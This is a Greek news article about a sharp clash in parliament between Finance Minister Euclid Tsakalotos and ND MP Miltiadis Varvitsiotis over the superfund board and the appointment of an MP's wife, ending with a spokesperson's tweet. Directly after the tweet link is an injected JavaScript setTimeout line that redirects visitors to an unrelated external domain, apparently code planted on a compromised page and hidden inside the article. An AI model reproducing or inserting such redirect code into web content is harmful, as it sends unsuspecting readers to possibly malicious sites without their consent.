Άγριος τσακωμός στη Βουλή Τσακαλώτου -Βαρβιτσιώτη για το υπερταμείο

0
42

 

Κι ενώ η συζήτηση στην ολομέλεια της Βουλής στρεφόταν γύρω από το υπερταμείο και τη σύσταση στου ΔΣ στο οποίο τελικά θα συμμετέχει και η Όλγα Χαρίτου που εκτός από στέλεχος του τραπεζικού κλάδου είναι και σύζυγος του βουλευτή του ΣΥΡΙΖΑ, Χριστόφορου Παπαδόπουλου, ο εισηγητής της ΝΔ, Μιλτιάδης Βαρβιτσιώτης, εξαπέλυσε ολομέτωπη επίθεση εναντίον της κυβέρνησης.

«Το υπερταμείο που συστήνετε τόσο διαφανώς… για να βολέψετε και κανέναν. Σύζυγος βουλευτή σας διαβάζουμε θα είναι μέσα στο Υπερταμείο. Τόση διαφάνεια…», σχολίασε ο βουλευτής της ΝΔ, προκαλώντας την έντονη αντίδραση του υπουργού Οικονομικών, Ευκλείδη Τσακαλώτου, ο οποίος τον αποκάλεσε «χυδαίο» προκαλώντας την έντονη αντίδραση του κ.Βαρβιτσιώτη.

– «Μιλάτε περί χυδαιότητας εσείς που συνεχίζετε να εμπαίζετε τον ελληνικό λαό», φώναξε ο κ. Βαρβιτσιώτης.
«Ντροπή σας», ανταπάντησε ο κ. Τσακαλώτος.
– «Επειδή λέω αλήθειες σας ενοχλεί. Να ανακαλέσει ο κ. υπουργός αλλιώς του χαρίζεται ο χαρακτηρισμός», σχολίασε ο βουλευτής της ΝΔ.

Λίγα λεπτά αργότερα, ο υπουργός Οικονομικών Ευκλείδης Τσακαλώτος θέλησε να απαντήσει και μάλιστα σε υψηλούς τόνους στον κ. Βαρβιτσιώτη λέγοντας χαρακτηριστικά:

«Παραφέρθηκα όταν είπα ότι είστε χυδαίος γιατί έπρεπε να πω ότι αυτό που είπατε είναι χυδαίο. Μετά από 100 χρόνια φεμινιστικού κινήματος να καταλάβετε ότι έχουν δική τους υπόσταση οι γυναίκες. Δεν είναι ούτε του αντρός ούτε του πατέρα τους. Ξεφτιλίζετε και τις γυναίκες του δικού σας κόμματος όταν μιλάτε έτσι», ανέφερε χαρακτηριστικά ο Ευκλείδης Τσακαλώτος.

«Βεβαίως με αποστόμωσε. Λέει ότι άξιες συζύγους έχουν μόνο οι βουλευτές του ΣΥΡΙΖΑ», αντέτεινε ο Μιλτιάδης Βαρβιτσιώτης.

«Η χυδαιότητα είναι να λέτε ότι έχουμε προτείνει έναν τραπεζικό, έναν πανεπιστημιακό και μία γυναίκα κάποιου βουλευτή. Γι’ αυτό δεν έχετε απήχηση στις γυναίκες», κατέληξε ο υπουργός, βάζοντας τέλος στη σφοδρή αντιπαράθεση.

Λίγη ώρα αργότερα η κυβερνητική εκπρόσωπος Όλγα Γεροβασίλη έκανε tweet με τη φράση του υπουργού Οικονομικών: «Πρέπει να μάθετε ότι οι γυναίκες δεν είναι ούτε του ανδρός τους ούτε του πατρός τους.Έχουν τη δική τους υπόσταση», σχολιάζοντας: «Το αυτονόητο»

https://twitter.com/olgagerovasili/status/780370645196673024 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here